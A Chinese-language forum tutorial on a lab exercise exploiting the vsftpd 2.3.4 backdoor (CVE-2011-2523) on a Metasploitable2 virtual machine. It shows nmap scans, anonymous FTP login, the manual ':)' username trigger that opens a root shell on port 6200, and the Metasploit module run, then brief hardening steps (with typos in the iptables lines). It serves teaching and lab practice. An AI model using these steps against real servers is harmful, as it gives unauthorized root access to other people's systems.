FTP漏洞利用

使徒行者vs   ·   发表于 2020-05-30 21:12:53   ·   实战纪实

FTP漏洞利用

一、环境说明

靶机IP:虚拟机ip.149 系统:Metasploitable2-Linux FTP版本号:vsftpd 2.3.4

攻击IP : 虚拟机ip.151 系统:Kali-linux-2019

ip :指同一网段的ip,这里隐藏了。做这个实验保证ip同一段就OK。

二、FTP协议介绍

文件传输协议(英文:File Transfer Protocol,缩写:FTP)是用于在网络上进行文件传输的一套标准协议,使用客户/服务器模式。它属于网络传输协议的应用层。FTP使用21号端口。

用户分类:

  • Real用户
  • Administrator
  • 匿名用户

FTP文件传输格式:

  • ASCII
  • 二进制格式

三、匿名用户登录

1、确认靶机IP地址

  1. root@kali:~# nmap ip.1/24
  2. ...
  3. Nmap scan report for ip.149
  4. Host is up (0.00050s latency).
  5. Not shown: 977 closed ports
  6. PORT STATE SERVICE
  7. 21/tcp open ftp
  8. 22/tcp open ssh
  9. 23/tcp open telnet
  10. 25/tcp open smtp
  11. 53/tcp open domain
  12. 80/tcp open http
  13. 111/tcp open rpcbind
  14. 139/tcp open netbios-ssn
  15. 445/tcp open microsoft-ds
  16. 512/tcp open exec
  17. 513/tcp open login
  18. 514/tcp open shell
  19. 1099/tcp open rmiregistry
  20. 1524/tcp open ingreslock
  21. 2049/tcp open nfs
  22. 2121/tcp open ccproxy-ftp
  23. 3306/tcp open mysql
  24. 5432/tcp open postgresql
  25. 5900/tcp open vnc
  26. 6000/tcp open X11
  27. 6667/tcp open irc
  28. 8009/tcp open ajp13
  29. 8180/tcp open unknown
  30. MAC Address: 00:0C:29:83:F3:95 (VMware)
  31. ...

备注:截取扫描的部分信息,确认靶机的IP为ip.149

2、确认FTP的版本

  1. root@kali:~# nmap -A ip.149
  2. ...
  3. PORT STATE SERVICE VERSION
  4. 21/tcp open ftp vsftpd 2.3.4
  5. |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
  6. | ftp-syst:
  7. | STAT:
  8. | FTP server status:
  9. | Connected to ip.151
  10. | Logged in as ftp
  11. | TYPE: ASCII
  12. | No session bandwidth limit
  13. | Session timeout in seconds is 300
  14. | Control connection is plain text
  15. | Data connections will be plain text
  16. | vsFTPd 2.3.4 - secure, fast, stable
  17. |_End of status
  18. ...

备注:
-A : 全扫描,扫描 OS版本、版本信息等

3、匿名用户登录

  1. root@kali:~#nc ip.149 21
  2. 220 (vsFTPd 2.3.4)
  3. USER anonymous
  4. 331 Please specify the password.
  5. PASS 123
  6. 230 Login successful.
  7. HELP
  8. 214-The following commands are recognized.
  9. ABOR ACCT ALLO APPE CDUP CWD DELE EPRT EPSV FEAT HELP LIST MDTM MKD
  10. MODE NLST NOOP OPTS PASS PASV PORT PWD QUIT REIN REST RETR RMD RNFR
  11. RNTO SITE SIZE SMNT STAT STOR STOU STRU SYST TYPE USER XCUP XCWD XMKD
  12. XPWD XRMD
  13. 214 Help OK.

USER/PASS 输入用户名(anonymous)/密码任意输入
通过匿名用户名,任意设置的密码成功登录靶机。
输入HELP查看,可以输入被识别的命令。

四、利用FTP后门漏洞

1、使用nmap扫描FTP后门漏洞

  1. root@kali:~# nmap --script=vuln -p 21 ip.149
  2. Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-21 15:15 CST
  3. Nmap scan report for 192.168.72.149
  4. Host is up (0.00036s latency).
  5. PORT STATE SERVICE
  6. 21/tcp open ftp
  7. |_clamav-exec: ERROR: Script execution failed (use -d to debug)
  8. | ftp-vsftpd-backdoor:
  9. | VULNERABLE:
  10. | vsFTPd version 2.3.4 backdoor
  11. | State: VULNERABLE (Exploitable)
  12. | IDs: CVE:CVE-2011-2523 BID:48539
  13. | vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.
  14. | Disclosure date: 2011-07-03
  15. | Exploit results:
  16. | Shell command: id
  17. | Results: uid=0(root) gid=0(root)
  18. | References:
  19. | https://www.securityfocus.com/bid/48539
  20. | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523
  21. | http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
  22. |_ https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
  23. |_sslv2-drown:
  24. MAC Address: 00:0C:29:83:F3:95 (VMware)
  25. Nmap done: 1 IP address (1 host up) scanned in 11.69 seconds

CVE : 公共漏洞和暴露

2、使用nc触发vsftpd-2.3.4后面漏洞

  1. root@kali:~# nc ip.149 21
  2. 220 (vsFTPd 2.3.4)
  3. USER user:)
  4. 331 Please specify the password.
  5. PASS pass

另外打开一个终端利用该漏洞

  1. root@kali:~# nc ip.149 6200
  2. id
  3. uid=0(root) gid=0(root)

nc已经成功登录靶机的bash,可以输入linux命令。
nc 靶机ip地址 端口号
vsftpd手工出发漏洞:当进行FTP认证时,如果用户名USER中包含:),那么直接就触发监听6200端口的连接的shell。
6200端口 默认没有开启的,从确认靶机IP的扫描信息就可以看出。

五、Metasploit实战:FTP漏洞利用

1、启动postgresql

  1. root@kali:~# systemctl start postgresql
  2. root@kali:~# systemctl status postgresql
  3. postgresql.service - PostgreSQL RDBMS
  4. Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; vendor p>
  5. Active: active (exited) since Thu 2020-05-21 15:22:14 CST; 15s ago
  6. Process: 6362 ExecStart=/bin/true (code=exited, status=0/SUCCESS)
  7. Main PID: 6362 (code=exited, status=0/SUCCESS)
  8. May 21 15:22:14 kali systemd[1]: Starting PostgreSQL RDBMS...
  9. May 21 15:22:14 kali systemd[1]: Finished PostgreSQL RDBMS.

systemctl start postgresql : 开启postgresql数据库

systemctl status postgresql :检测postgresql数据库的状态

2、使用Metasploit进行渗透

2.1 登录msfconsole控制台

  1. root@kali:~# msfconsole

2.2 连接一个DB

  1. msf5 > db_connect msf:123456@127.0.0.1/msf

连接metasploit的默认msf数据库,也可以自己创建数据库,连接自己创建的数据库。数据库记录探测的记录。

2.3 使用nmap探测目标FTP

  1. msf5 > db_nmap -sV -p 21 ip.149
  2. [*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-21 20:18 CST
  3. [*] Nmap: Nmap scan report for 192.168.72.149
  4. [*] Nmap: Host is up (0.00032s latency).
  5. [*] Nmap: PORT STATE SERVICE VERSION
  6. [*] Nmap: 21/tcp open ftp vsftpd 2.3.4
  7. [*] Nmap: MAC Address: 00:0C:29:83:F3:95 (VMware)
  8. [*] Nmap: Service Info: OS: Unix
  9. [*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  10. [*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 2.70 seconds

2.4 查看数据库探测记录

  1. msf5 > services
  2. Services
  3. ========
  4. host port proto name state info
  5. ---- ---- ----- ---- ----- ----
  6. ip.149 21 tcp ftp open vsftpd 2.3.4

2.5 搜索漏洞代码

  1. msf5 > search vsftpd 2.3.4
  2. Matching Modules
  3. ================
  4. # Name Disclosure Date Rank Check Description
  5. - ---- --------------- ---- ----- -----------
  6. 0 auxiliary/gather/teamtalk_creds normal No TeamTalk Gather Credentials
  7. 1 exploit/multi/http/oscommerce_installer_unauth_code_exec 2018-04-30 excellent Yes osCommerce Installer Unauthenticated Code Execution
  8. 2 exploit/multi/http/struts2_namespace_ognl 2018-08-22 excellent Yes Apache Struts 2 Namespace Redirect OGNL Injection
  9. 3 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution

2.6 设置payload相关配置

  1. msf5 > use exploit/unix/ftp/vsftpd_234_backdoor
  2. msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options
  3. Module options (exploit/unix/ftp/vsftpd_234_backdoor):
  4. Name Current Setting Required Description
  5. ---- --------------- -------- -----------
  6. RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  7. RPORT 21 yes The target port (TCP)
  8. Exploit target:
  9. Id Name
  10. -- ----
  11. 0 Automatic

2.7 设置靶机IP地址,查看设置是否成功

  1. msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS ip.149
  2. RHOSTS => ip.149
  3. msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options
  4. Module options (exploit/unix/ftp/vsftpd_234_backdoor):
  5. Name Current Setting Required Description
  6. ---- --------------- -------- -----------
  7. RHOSTS ip.149 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  8. RPORT 21 yes The target port (TCP)
  9. Exploit target:
  10. Id Name
  11. -- ----
  12. 0 Automatic

2.8 执行exploit攻击,获得Bash shell

  1. msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
  2. [*] ip.149:21 - Banner: 220 (vsFTPd 2.3.4)
  3. [*] ip.149:21 - USER: 331 Please specify the password.
  4. [+] ip.149:21 - Backdoor service has been spawned, handling...
  5. [+] ip.149:21 - UID: uid=0(root) gid=0(root)
  6. [*] Found shell.
  7. [*] Command shell session 1 opened (0.0.0.0:0 -> ip.149:6200) at 2020-05-21 15:53:08 +0800
  8. whoami
  9. root

验证是否登录了靶机的Bash shell。输入whoami命令,查看登录用户名为root。也可以输入其他命令。

六、FTP漏洞加固

1、修改系统FTP配置文档(/etc/vsftpd/vsftpd.conf),禁止匿名用户登录。
2、对特定漏洞进行打补丁,或者设置防火墙禁止连接后门端口。

  1. iptables -A INPUT -p tcp -dport 6200 -j DROP
  2. iptabels -A OUTPUT -p tcp sport 6200 -j DROP
用户名金币积分时间理由
admin 50.00 0 2020-06-01 15:03:48

打赏我,让我更有动力~

0 Reply   |  Until 2020-5-30 | 1211 View
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2023 掌控者 All Rights Reserved.